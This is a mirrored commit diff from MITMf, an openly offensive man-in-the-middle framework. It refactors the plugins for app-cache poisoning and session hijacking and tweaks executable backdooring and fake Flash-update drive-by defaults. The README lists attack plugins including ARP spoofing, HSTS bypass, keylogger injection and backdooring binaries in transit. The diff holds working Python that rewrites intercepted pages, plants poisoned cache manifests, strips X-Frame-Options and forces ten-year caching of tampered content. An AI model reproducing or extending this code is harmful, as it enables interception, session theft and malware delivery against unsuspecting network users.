mirror of
https://github.com/byt3bl33d3r/MITMf.git
synced 2025-07-06 21:12:16 -07:00
App-Cache poison and BrowserSniper plugins have been refactored, added supported python version tags in README
This commit is contained in:
parent
52a493995a
commit
f0fce41c88
16 changed files with 96 additions and 121 deletions
|
@ -10,6 +10,7 @@
|
||||||
- @golind
|
- @golind
|
||||||
- @mmetince
|
- @mmetince
|
||||||
- @niallmerrigan
|
- @niallmerrigan
|
||||||
|
- @auraltension
|
||||||
|
|
||||||
#Unintentional contributors and/or projects that I stole code from
|
#Unintentional contributors and/or projects that I stole code from
|
||||||
|
|
||||||
|
|
36
README.md
36
README.md
|
@ -1,3 +1,5 @@
|
||||||
|
[]
|
||||||
|
|
||||||
#MITMf V0.9.8 - 'The Dark Side'
|
#MITMf V0.9.8 - 'The Dark Side'
|
||||||
|
|
||||||
Framework for Man-In-The-Middle attacks
|
Framework for Man-In-The-Middle attacks
|
||||||
|
@ -15,23 +17,23 @@ Contact me at:
|
||||||
|
|
||||||
Available plugins
|
Available plugins
|
||||||
=================
|
=================
|
||||||
- ```HTA Drive-By``` - Injects a fake update notification and prompts clients to download an HTA application
|
- ```HTA Drive-By``` : Injects a fake update notification and prompts clients to download an HTA application
|
||||||
- ```SMBtrap``` - Exploits the 'SMB Trap' vulnerability on connected clients
|
- ```SMBtrap``` : Exploits the 'SMB Trap' vulnerability on connected clients
|
||||||
- ```Screenshotter``` - Uses HTML5 Canvas to render an accurate screenshot of a clients browser
|
- ```Screenshotter``` : Uses HTML5 Canvas to render an accurate screenshot of a clients browser
|
||||||
- ```Responder``` - LLMNR, NBT-NS, WPAD and MDNS poisoner
|
- ```Responder``` : LLMNR, NBT-NS, WPAD and MDNS poisoner
|
||||||
- ```SSLstrip+``` - Partially bypass HSTS
|
- ```SSLstrip+``` : Partially bypass HSTS
|
||||||
- ```Spoof``` - Redirect traffic using ARP spoofing, ICMP redirects or DHCP spoofing
|
- ```Spoof``` : Redirect traffic using ARP spoofing, ICMP redirects or DHCP spoofing
|
||||||
- ```BeEFAutorun``` - Autoruns BeEF modules based on a client's OS or browser type
|
- ```BeEFAutorun``` : Autoruns BeEF modules based on a client's OS or browser type
|
||||||
- ```AppCachePoison``` - Perform app cache poisoning attacks
|
- ```AppCachePoison``` : Perform app cache poisoning attacks
|
||||||
- ```Ferret-NG``` - Transperently hijacks sessions
|
- ```Ferret-NG``` : Transperently hijacks sessions
|
||||||
- ```BrowserProfiler``` - Attempts to enumerate all browser plugins of connected clients
|
- ```BrowserProfiler``` : Attempts to enumerate all browser plugins of connected clients
|
||||||
- ```FilePwn``` - Backdoor executables sent over HTTP using the Backdoor Factory and BDFProxy
|
- ```FilePwn``` : Backdoor executables sent over HTTP using the Backdoor Factory and BDFProxy
|
||||||
- ```Inject``` - Inject arbitrary content into HTML content
|
- ```Inject``` : Inject arbitrary content into HTML content
|
||||||
- ```BrowserSniper``` - Performs drive-by attacks on clients with out-of-date browser plugins
|
- ```BrowserSniper``` : Performs drive-by attacks on clients with out-of-date browser plugins
|
||||||
- ```jskeylogger``` - Injects a Javascript keylogger into a client's webpages
|
- ```jskeylogger``` : Injects a Javascript keylogger into a client's webpages
|
||||||
- ```Replace``` - Replace arbitary content in HTML content
|
- ```Replace``` : Replace arbitary content in HTML content
|
||||||
- ```SMBAuth``` - Evoke SMB challenge-response authentication attempts
|
- ```SMBAuth``` : Evoke SMB challenge-response authentication attempts
|
||||||
- ```Upsidedownternet``` - Flips images 180 degrees
|
- ```Upsidedownternet``` : Flips images 180 degrees
|
||||||
|
|
||||||
How to install on Kali
|
How to install on Kali
|
||||||
======================
|
======================
|
||||||
|
|
|
@ -34,5 +34,5 @@
|
||||||
</div>
|
</div>
|
||||||
<div style="padding: 1em;border:1px solid red;margin:1em">
|
<div style="padding: 1em;border:1px solid red;margin:1em">
|
||||||
<h1>AppCache Poison works!</h1>
|
<h1>AppCache Poison works!</h1>
|
||||||
<p><code>%%tamper_url%%</code> page is spoofed with <a href="https://github.com/koto/sslstrip">AppCache Poison</a> by <a href="http://blog.kotowicz.net">Krzysztof Kotowicz</a>, but this is just a default content. To replace it, create appropriate files in your templates directory and add your content there.</p>
|
<p>This page is spoofed with <a href="https://github.com/koto/sslstrip">AppCache Poison</a> by <a href="http://blog.kotowicz.net">Krzysztof Kotowicz</a>, but this is just a default content. To replace it, create appropriate files in your templates directory and add your content there.</p>
|
||||||
</div>
|
</div>
|
|
@ -1,2 +1,2 @@
|
||||||
|
|
||||||
;console.log('AppCache Poison was here. Google Analytics FTW');
|
;alert('AppCache Poison was here. Google Analytics FTW');
|
|
@ -142,7 +142,7 @@
|
||||||
# Here you can specify the client to hijack sessions from
|
# Here you can specify the client to hijack sessions from
|
||||||
#
|
#
|
||||||
|
|
||||||
Client = '192.168.20.126'
|
Client = '192.168.1.26'
|
||||||
|
|
||||||
[SSLstrip+]
|
[SSLstrip+]
|
||||||
|
|
||||||
|
@ -248,18 +248,9 @@
|
||||||
templates=test # which templates to use for spoofing content?
|
templates=test # which templates to use for spoofing content?
|
||||||
skip_in_mass_poison=1
|
skip_in_mass_poison=1
|
||||||
|
|
||||||
[[gmail]]
|
|
||||||
#use absolute URLs - system tracks 30x redirects, so you can put any URL that belongs to the redirection loop here
|
|
||||||
|
|
||||||
tamper_url=http://mail.google.com/mail/
|
|
||||||
|
|
||||||
# manifest has to be of last domain in redirect loop
|
|
||||||
|
|
||||||
manifest_url=http://mail.google.com/robots.txt
|
|
||||||
templates=default # could be omitted
|
|
||||||
|
|
||||||
[[google]]
|
[[google]]
|
||||||
tamper_url = http://www.google.com/
|
tamper_url_match = http://www.google.com\.*.
|
||||||
|
tamper_url = http://www.google.com
|
||||||
manifest_url = http://www.google.com/robots.txt
|
manifest_url = http://www.google.com/robots.txt
|
||||||
|
|
||||||
[[facebook]]
|
[[facebook]]
|
||||||
|
@ -269,7 +260,7 @@
|
||||||
|
|
||||||
[[twitter]]
|
[[twitter]]
|
||||||
tamper_url=http://twitter.com/
|
tamper_url=http://twitter.com/
|
||||||
#tamper_url_match=^http://(www\.)?twitter\.com/$
|
tamper_url_match=^http://(www\.)?twitter\.com/$
|
||||||
manifest_url=http://twitter.com/robots.txt
|
manifest_url=http://twitter.com/robots.txt
|
||||||
|
|
||||||
[[html5rocks]]
|
[[html5rocks]]
|
||||||
|
|
|
@ -32,6 +32,7 @@ from twisted.internet import defer
|
||||||
from twisted.internet import reactor
|
from twisted.internet import reactor
|
||||||
from twisted.internet.protocol import ClientFactory
|
from twisted.internet.protocol import ClientFactory
|
||||||
|
|
||||||
|
from core.logger import logger
|
||||||
from ServerConnectionFactory import ServerConnectionFactory
|
from ServerConnectionFactory import ServerConnectionFactory
|
||||||
from ServerConnection import ServerConnection
|
from ServerConnection import ServerConnection
|
||||||
from SSLServerConnection import SSLServerConnection
|
from SSLServerConnection import SSLServerConnection
|
||||||
|
@ -39,7 +40,7 @@ from URLMonitor import URLMonitor
|
||||||
from CookieCleaner import CookieCleaner
|
from CookieCleaner import CookieCleaner
|
||||||
from DnsCache import DnsCache
|
from DnsCache import DnsCache
|
||||||
|
|
||||||
formatter = logging.Formatter("%(asctime)s [Ferrent-NG] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
|
formatter = logging.Formatter("%(asctime)s [Ferret-NG] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
|
||||||
log = logger().setup_logger("Ferret_ClientRequest", formatter)
|
log = logger().setup_logger("Ferret_ClientRequest", formatter)
|
||||||
|
|
||||||
class ClientRequest(Request):
|
class ClientRequest(Request):
|
||||||
|
@ -79,7 +80,6 @@ class ClientRequest(Request):
|
||||||
headers['cookie'] = entry['cookie']
|
headers['cookie'] = entry['cookie']
|
||||||
except KeyError:
|
except KeyError:
|
||||||
log.error("No captured sessions (yet) from {}".format(self.urlMonitor.hijack_client))
|
log.error("No captured sessions (yet) from {}".format(self.urlMonitor.hijack_client))
|
||||||
pass
|
|
||||||
|
|
||||||
return headers
|
return headers
|
||||||
|
|
||||||
|
|
|
@ -15,8 +15,6 @@
|
||||||
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
|
||||||
# USA
|
# USA
|
||||||
#
|
#
|
||||||
|
|
||||||
import logging
|
|
||||||
import string
|
import string
|
||||||
|
|
||||||
class CookieCleaner:
|
class CookieCleaner:
|
||||||
|
|
|
@ -18,10 +18,11 @@
|
||||||
|
|
||||||
import logging, re, string
|
import logging, re, string
|
||||||
|
|
||||||
|
from core.logger import logger
|
||||||
from ServerConnection import ServerConnection
|
from ServerConnection import ServerConnection
|
||||||
from URLMonitor import URLMonitor
|
from URLMonitor import URLMonitor
|
||||||
|
|
||||||
formatter = logging.Formatter("%(asctime)s [Ferrent-NG] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
|
formatter = logging.Formatter("%(asctime)s [Ferret-NG] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
|
||||||
log = logger().setup_logger("Ferret_SSLServerConnection", formatter)
|
log = logger().setup_logger("Ferret_SSLServerConnection", formatter)
|
||||||
|
|
||||||
class SSLServerConnection(ServerConnection):
|
class SSLServerConnection(ServerConnection):
|
||||||
|
|
|
@ -25,10 +25,11 @@ import gzip
|
||||||
import StringIO
|
import StringIO
|
||||||
import sys
|
import sys
|
||||||
|
|
||||||
|
from core.logger import logger
|
||||||
from twisted.web.http import HTTPClient
|
from twisted.web.http import HTTPClient
|
||||||
from URLMonitor import URLMonitor
|
from URLMonitor import URLMonitor
|
||||||
|
|
||||||
formatter = logging.Formatter("%(asctime)s [Ferrent-NG] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
|
formatter = logging.Formatter("%(asctime)s [Ferret-NG] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
|
||||||
log = logger().setup_logger("Ferret_ServerConnection", formatter)
|
log = logger().setup_logger("Ferret_ServerConnection", formatter)
|
||||||
|
|
||||||
class ServerConnection(HTTPClient):
|
class ServerConnection(HTTPClient):
|
||||||
|
|
|
@ -20,7 +20,7 @@ import logging
|
||||||
from core.logger import logger
|
from core.logger import logger
|
||||||
from twisted.internet.protocol import ClientFactory
|
from twisted.internet.protocol import ClientFactory
|
||||||
|
|
||||||
formatter = logging.Formatter("%(asctime)s [Ferrent-NG] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
|
formatter = logging.Formatter("%(asctime)s [Ferret-NG] %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
|
||||||
log = logger().setup_logger("Ferret_ServerConnectionFactory", formatter)
|
log = logger().setup_logger("Ferret_ServerConnectionFactory", formatter)
|
||||||
|
|
||||||
class ServerConnectionFactory(ClientFactory):
|
class ServerConnectionFactory(ClientFactory):
|
||||||
|
|
1
mitmf.py
1
mitmf.py
|
@ -83,6 +83,7 @@ from core.sslstrip.StrippingProxy import StrippingProxy
|
||||||
from core.sslstrip.URLMonitor import URLMonitor
|
from core.sslstrip.URLMonitor import URLMonitor
|
||||||
|
|
||||||
URLMonitor.getInstance().setFaviconSpoofing(options.favicon)
|
URLMonitor.getInstance().setFaviconSpoofing(options.favicon)
|
||||||
|
URLMonitor.getInstance().setCaching(options.preserve_cache)
|
||||||
CookieCleaner.getInstance().setEnabled(options.killsessions)
|
CookieCleaner.getInstance().setEnabled(options.killsessions)
|
||||||
|
|
||||||
strippingFactory = http.HTTPFactory(timeout=10)
|
strippingFactory = http.HTTPFactory(timeout=10)
|
||||||
|
|
|
@ -34,22 +34,19 @@ class AppCachePlugin(Plugin):
|
||||||
def initialize(self, options):
|
def initialize(self, options):
|
||||||
self.options = options
|
self.options = options
|
||||||
self.mass_poisoned_browsers = []
|
self.mass_poisoned_browsers = []
|
||||||
|
|
||||||
from core.sslstrip.URLMonitor import URLMonitor
|
from core.sslstrip.URLMonitor import URLMonitor
|
||||||
self.urlMonitor = URLMonitor.getInstance()
|
self.urlMonitor = URLMonitor.getInstance()
|
||||||
self.urlMonitor.setAppCachePoisoning()
|
self.urlMonitor.setAppCachePoisoning()
|
||||||
|
|
||||||
def response(self, response, request, data):
|
def response(self, response, request, data):
|
||||||
|
|
||||||
#This code was literally copied + pasted from Koto's sslstrip fork, def need to clean this up in the near future
|
self.app_config = self.config['AppCachePoison']
|
||||||
|
|
||||||
self.app_config = self.config['AppCachePoison'] # so we reload the config on each request
|
|
||||||
url = request.client.uri
|
url = request.client.uri
|
||||||
req_headers = request.client.getAllHeaders()
|
req_headers = request.client.getAllHeaders()
|
||||||
headers = request.client.responseHeaders
|
headers = request.client.responseHeaders
|
||||||
ip = request.client.getClientIP()
|
ip = request.client.getClientIP()
|
||||||
|
|
||||||
#########################################################################
|
|
||||||
|
|
||||||
if "enable_only_in_useragents" in self.app_config:
|
if "enable_only_in_useragents" in self.app_config:
|
||||||
regexp = self.app_config["enable_only_in_useragents"]
|
regexp = self.app_config["enable_only_in_useragents"]
|
||||||
if regexp and not re.search(regexp,req_headers["user-agent"]):
|
if regexp and not re.search(regexp,req_headers["user-agent"]):
|
||||||
|
@ -58,53 +55,56 @@ class AppCachePlugin(Plugin):
|
||||||
|
|
||||||
urls = self.urlMonitor.getRedirectionSet(url)
|
urls = self.urlMonitor.getRedirectionSet(url)
|
||||||
self.clientlog.debug("Got redirection set: {}".format(urls), extra=request.clientInfo)
|
self.clientlog.debug("Got redirection set: {}".format(urls), extra=request.clientInfo)
|
||||||
(name,s,element,url) = self.getSectionForUrls(urls)
|
|
||||||
|
|
||||||
if s is False:
|
section = False
|
||||||
data = self.tryMassPoison(url, data, headers, req_headers, ip)
|
for url in urls:
|
||||||
return {'response': response, 'request': request, 'data': data}
|
for name in self.app_config:
|
||||||
|
if isinstance(self.app_config[name], dict): #'tis a section
|
||||||
|
section = self.app_config[name]
|
||||||
|
|
||||||
self.clientlog.info("Found URL {} in section {}".format(url, name), extra=request.clientInfo)
|
if section.get('manifest_url', False) == url:
|
||||||
p = self.getTemplatePrefix(s)
|
self.clientlog.info("Found URL in section '{}'!".format(name), extra=request.clientInfo)
|
||||||
|
|
||||||
if element == 'tamper':
|
|
||||||
self.clientlog.info("Poisoning tamper URL with template {}".format(p), extra=request.clientInfo)
|
|
||||||
if os.path.exists(p + '.replace'): # replace whole content
|
|
||||||
f = open(p + '.replace','r')
|
|
||||||
data = self.decorate(f.read(), s)
|
|
||||||
f.close()
|
|
||||||
|
|
||||||
elif os.path.exists(p + '.append'): # append file to body
|
|
||||||
f = open(p + '.append','r')
|
|
||||||
appendix = self.decorate(f.read(), s)
|
|
||||||
f.close()
|
|
||||||
# append to body
|
|
||||||
data = re.sub(re.compile("</body>",re.IGNORECASE),appendix + "</body>", data)
|
|
||||||
|
|
||||||
# add manifest reference
|
|
||||||
data = re.sub(re.compile("<html",re.IGNORECASE),"<html manifest=\"" + self.getManifestUrl(s)+"\"", data)
|
|
||||||
|
|
||||||
elif element == "manifest":
|
|
||||||
self.clientlog.info("Poisoning manifest URL", extra=request.clientInfo)
|
self.clientlog.info("Poisoning manifest URL", extra=request.clientInfo)
|
||||||
data = self.getSpoofedManifest(url, s)
|
data = self.getSpoofedManifest(url, section)
|
||||||
headers.setRawHeaders("Content-Type", ["text/cache-manifest"])
|
headers.setRawHeaders("Content-Type", ["text/cache-manifest"])
|
||||||
|
|
||||||
elif element == "raw": # raw resource to modify, it does not have to be html
|
elif section.get('raw_url',False) == url: # raw resource to modify, it does not have to be html
|
||||||
|
self.clientlog.info("Found URL in section '{}'!".format(name), extra=request.clientInfo)
|
||||||
|
p = self.getTemplatePrefix(section)
|
||||||
self.clientlog.info("Poisoning raw URL", extra=request.clientInfo)
|
self.clientlog.info("Poisoning raw URL", extra=request.clientInfo)
|
||||||
if os.path.exists(p + '.replace'): # replace whole content
|
if os.path.exists(p + '.replace'): # replace whole content
|
||||||
f = open(p + '.replace', 'r')
|
f = open(p + '.replace', 'r')
|
||||||
data = self.decorate(f.read(), s)
|
data = f.read()
|
||||||
f.close()
|
f.close()
|
||||||
|
|
||||||
elif os.path.exists(p + '.append'): # append file to body
|
elif os.path.exists(p + '.append'): # append file to body
|
||||||
f = open(p + '.append', 'r')
|
f = open(p + '.append', 'r')
|
||||||
appendix = self.decorate(f.read(), s)
|
data += f.read()
|
||||||
f.close()
|
f.close()
|
||||||
# append to response body
|
|
||||||
data += appendix
|
elif (section.get('tamper_url',False) == url) or (section.has_key('tamper_url_match') and re.search(section['tamper_url_match'], url)):
|
||||||
|
self.clientlog.info("Found URL in section '{}'!".format(name), extra=request.clientInfo)
|
||||||
|
p = self.getTemplatePrefix(section)
|
||||||
|
self.clientlog.info("Poisoning URL with tamper template: {}".format(p), extra=request.clientInfo)
|
||||||
|
if os.path.exists(p + '.replace'): # replace whole content
|
||||||
|
f = open(p + '.replace', 'r')
|
||||||
|
data = f.read()
|
||||||
|
f.close()
|
||||||
|
|
||||||
|
elif os.path.exists(p + '.append'): # append file to body
|
||||||
|
f = open(p + '.append', 'r')
|
||||||
|
appendix = f.read()
|
||||||
|
data = re.sub(re.compile("</body>",re.IGNORECASE), appendix + "</body>", data) #append to body
|
||||||
|
f.close()
|
||||||
|
|
||||||
|
# add manifest reference
|
||||||
|
data = re.sub(re.compile("<html",re.IGNORECASE),"<html manifest=\"" + self.getManifestUrl(section)+"\"", data)
|
||||||
|
|
||||||
|
if section is False:
|
||||||
|
data = self.tryMassPoison(url, data, headers, req_headers, ip)
|
||||||
|
|
||||||
self.cacheForFuture(headers)
|
self.cacheForFuture(headers)
|
||||||
self.removeDangerousHeaders(headers)
|
headers.removeHeader("X-Frame-Options")
|
||||||
return {'response': response, 'request': request, 'data': data}
|
return {'response': response, 'request': request, 'data': data}
|
||||||
|
|
||||||
def tryMassPoison(self, url, data, headers, req_headers, ip):
|
def tryMassPoison(self, url, data, headers, req_headers, ip):
|
||||||
|
@ -112,14 +112,19 @@ class AppCachePlugin(Plugin):
|
||||||
|
|
||||||
if not 'mass_poison_url_match' in self.app_config: # no url
|
if not 'mass_poison_url_match' in self.app_config: # no url
|
||||||
return data
|
return data
|
||||||
|
|
||||||
if browser_id in self.mass_poisoned_browsers: #already poisoned
|
if browser_id in self.mass_poisoned_browsers: #already poisoned
|
||||||
return data
|
return data
|
||||||
|
|
||||||
if not headers.hasHeader('content-type') or not re.search('html(;|$)', headers.getRawHeaders('content-type')[0]): #not HTML
|
if not headers.hasHeader('content-type') or not re.search('html(;|$)', headers.getRawHeaders('content-type')[0]): #not HTML
|
||||||
return data
|
return data
|
||||||
|
|
||||||
if 'mass_poison_useragent_match' in self.app_config and not "user-agent" in req_headers:
|
if 'mass_poison_useragent_match' in self.app_config and not "user-agent" in req_headers:
|
||||||
return data
|
return data
|
||||||
|
|
||||||
if not re.search(self.app_config['mass_poison_useragent_match'], req_headers['user-agent']): #different UA
|
if not re.search(self.app_config['mass_poison_useragent_match'], req_headers['user-agent']): #different UA
|
||||||
return data
|
return data
|
||||||
|
|
||||||
if not re.search(self.app_config['mass_poison_url_match'], url): #different url
|
if not re.search(self.app_config['mass_poison_url_match'], url): #different url
|
||||||
return data
|
return data
|
||||||
|
|
||||||
|
@ -140,14 +145,11 @@ class AppCachePlugin(Plugin):
|
||||||
|
|
||||||
def cacheForFuture(self, headers):
|
def cacheForFuture(self, headers):
|
||||||
ten_years = 315569260
|
ten_years = 315569260
|
||||||
headers.setRawHeaders("Cache-Control",["max-age="+str(ten_years)])
|
headers.setRawHeaders("Cache-Control",["max-age={}".format(ten_years)])
|
||||||
headers.setRawHeaders("Last-Modified",["Mon, 29 Jun 1998 02:28:12 GMT"]) # it was modifed long ago, so is most likely fresh
|
headers.setRawHeaders("Last-Modified",["Mon, 29 Jun 1998 02:28:12 GMT"]) # it was modifed long ago, so is most likely fresh
|
||||||
in_ten_years = date.fromtimestamp(time.time() + ten_years)
|
in_ten_years = date.fromtimestamp(time.time() + ten_years)
|
||||||
headers.setRawHeaders("Expires",[in_ten_years.strftime("%a, %d %b %Y %H:%M:%S GMT")])
|
headers.setRawHeaders("Expires",[in_ten_years.strftime("%a, %d %b %Y %H:%M:%S GMT")])
|
||||||
|
|
||||||
def removeDangerousHeaders(self, headers):
|
|
||||||
headers.removeHeader("X-Frame-Options")
|
|
||||||
|
|
||||||
def getSpoofedManifest(self, url, section):
|
def getSpoofedManifest(self, url, section):
|
||||||
p = self.getTemplatePrefix(section)
|
p = self.getTemplatePrefix(section)
|
||||||
if not os.path.exists(p+'.manifest'):
|
if not os.path.exists(p+'.manifest'):
|
||||||
|
@ -159,8 +161,8 @@ class AppCachePlugin(Plugin):
|
||||||
return self.decorate(manifest, section)
|
return self.decorate(manifest, section)
|
||||||
|
|
||||||
def decorate(self, content, section):
|
def decorate(self, content, section):
|
||||||
for i in section:
|
for entry in section:
|
||||||
content = content.replace("%%"+i+"%%", section[i])
|
content = content.replace("%%{}%%".format(entry), section[entry])
|
||||||
return content
|
return content
|
||||||
|
|
||||||
def getTemplatePrefix(self, section):
|
def getTemplatePrefix(self, section):
|
||||||
|
@ -174,24 +176,3 @@ class AppCachePlugin(Plugin):
|
||||||
|
|
||||||
def getManifestUrl(self, section):
|
def getManifestUrl(self, section):
|
||||||
return section.get("manifest_url",'/robots.txt')
|
return section.get("manifest_url",'/robots.txt')
|
||||||
|
|
||||||
def getSectionForUrls(self, urls):
|
|
||||||
for url in urls:
|
|
||||||
for i in self.app_config:
|
|
||||||
if isinstance(self.app_config[i], dict): #section
|
|
||||||
section = self.app_config[i]
|
|
||||||
name = i
|
|
||||||
|
|
||||||
if section.get('tamper_url',False) == url:
|
|
||||||
return (name, section, 'tamper',url)
|
|
||||||
|
|
||||||
if section.has_key('tamper_url_match') and re.search(section['tamper_url_match'], url):
|
|
||||||
return (name, section, 'tamper',url)
|
|
||||||
|
|
||||||
if section.get('manifest_url',False) == url:
|
|
||||||
return (name, section, 'manifest',url)
|
|
||||||
|
|
||||||
if section.get('raw_url',False) == url:
|
|
||||||
return (name, section, 'raw',url)
|
|
||||||
|
|
||||||
return (None, False,'',urls.copy().pop())
|
|
||||||
|
|
|
@ -23,7 +23,7 @@ from datetime import datetime
|
||||||
from plugins.plugin import Plugin
|
from plugins.plugin import Plugin
|
||||||
from twisted.internet import reactor
|
from twisted.internet import reactor
|
||||||
from twisted.web import http
|
from twisted.web import http
|
||||||
from twisted.internet import reactor
|
from core.ferretng.URLMonitor import URLMonitor
|
||||||
|
|
||||||
class FerretNG(Plugin):
|
class FerretNG(Plugin):
|
||||||
name = "Ferret-NG"
|
name = "Ferret-NG"
|
||||||
|
@ -37,9 +37,6 @@ class FerretNG(Plugin):
|
||||||
self.ferret_port = options.ferret_port
|
self.ferret_port = options.ferret_port
|
||||||
self.cookie_file = None
|
self.cookie_file = None
|
||||||
|
|
||||||
from core.ferretng.FerretProxy import FerretProxy
|
|
||||||
from core.ferretng.URLMonitor import URLMonitor
|
|
||||||
|
|
||||||
URLMonitor.getInstance().hijack_client = self.config['Ferret-NG']['Client']
|
URLMonitor.getInstance().hijack_client = self.config['Ferret-NG']['Client']
|
||||||
|
|
||||||
from core.utils import shutdown
|
from core.utils import shutdown
|
||||||
|
@ -79,6 +76,7 @@ class FerretNG(Plugin):
|
||||||
URLMonitor.getInstance().cookies[client].append({'host': host, 'cookie': cookie})
|
URLMonitor.getInstance().cookies[client].append({'host': host, 'cookie': cookie})
|
||||||
|
|
||||||
def reactor(self, StrippingProxy):
|
def reactor(self, StrippingProxy):
|
||||||
|
from core.ferretng.FerretProxy import FerretProxy
|
||||||
FerretFactory = http.HTTPFactory(timeout=10)
|
FerretFactory = http.HTTPFactory(timeout=10)
|
||||||
FerretFactory.protocol = FerretProxy
|
FerretFactory.protocol = FerretProxy
|
||||||
reactor.listenTCP(self.ferret_port, FerretFactory)
|
reactor.listenTCP(self.ferret_port, FerretFactory)
|
||||||
|
|
|
@ -388,7 +388,7 @@ class FilePwn(Plugin):
|
||||||
continue
|
continue
|
||||||
|
|
||||||
# Check against keywords
|
# Check against keywords
|
||||||
keywordCheck = False
|
keywordCheck = True
|
||||||
|
|
||||||
if type(self.tarblacklist) is str:
|
if type(self.tarblacklist) is str:
|
||||||
if self.tarblacklist.lower() in info.name.lower():
|
if self.tarblacklist.lower() in info.name.lower():
|
||||||
|
@ -502,7 +502,7 @@ class FilePwn(Plugin):
|
||||||
continue
|
continue
|
||||||
|
|
||||||
#Check against keywords
|
#Check against keywords
|
||||||
keywordCheck = False
|
keywordCheck = True
|
||||||
|
|
||||||
if type(self.zipblacklist) is str:
|
if type(self.zipblacklist) is str:
|
||||||
if self.zipblacklist.lower() in info.filename.lower():
|
if self.zipblacklist.lower() in info.filename.lower():
|
||||||
|
@ -591,7 +591,8 @@ class FilePwn(Plugin):
|
||||||
def response(self, response, request, data):
|
def response(self, response, request, data):
|
||||||
|
|
||||||
content_header = response.headers['Content-Type']
|
content_header = response.headers['Content-Type']
|
||||||
client_ip = response.getClientIP()
|
content_length = int(response.headers['Content-Length'])
|
||||||
|
client_ip = request.client.getClientIP()
|
||||||
|
|
||||||
for target in self.userConfig['targets'].keys():
|
for target in self.userConfig['targets'].keys():
|
||||||
if target == 'ALL':
|
if target == 'ALL':
|
||||||
|
@ -630,7 +631,7 @@ class FilePwn(Plugin):
|
||||||
self.clientlog.info("Patching complete, forwarding to client!", extra=request.clientInfo)
|
self.clientlog.info("Patching complete, forwarding to client!", extra=request.clientInfo)
|
||||||
return {'response': response, 'request': request, 'data': bd_tar}
|
return {'response': response, 'request': request, 'data': bd_tar}
|
||||||
|
|
||||||
elif content_header in self.binaryMimeTypes:
|
elif (content_header in self.binaryMimeTypes) and (content_length <= self.FileSizeMax):
|
||||||
for bintype in ['pe','elf','fatfile','machox64','machox86']:
|
for bintype in ['pe','elf','fatfile','machox64','machox86']:
|
||||||
if self.bytes_have_format(data, bintype):
|
if self.bytes_have_format(data, bintype):
|
||||||
self.clientlog.info("Detected supported binary type ({})!".format(bintype), extra=request.clientInfo)
|
self.clientlog.info("Detected supported binary type ({})!".format(bintype), extra=request.clientInfo)
|
||||||
|
|
|
@ -53,4 +53,4 @@ class HTADriveBy(Inject, Plugin):
|
||||||
|
|
||||||
def options(self, options):
|
def options(self, options):
|
||||||
options.add_argument('--text', type=str, default='The Adobe Flash Player plug-in was blocked because it is out of date.', help="Text to display on notification bar")
|
options.add_argument('--text', type=str, default='The Adobe Flash Player plug-in was blocked because it is out of date.', help="Text to display on notification bar")
|
||||||
options.add_argument('--hta-app', type=str, default='./config/hta_driveby/Flash.hta', help='Path to HTA application [defaults to config/hta_driveby/Flash.hta]')
|
options.add_argument('--hta-app', type=str, default='./config/hta_driveby/flash_setup.hta', help='Path to HTA application [defaults to config/hta_driveby/flash_setup.hta]')
|
||||||
|
|
Loading…
Add table
Add a link
Reference in a new issue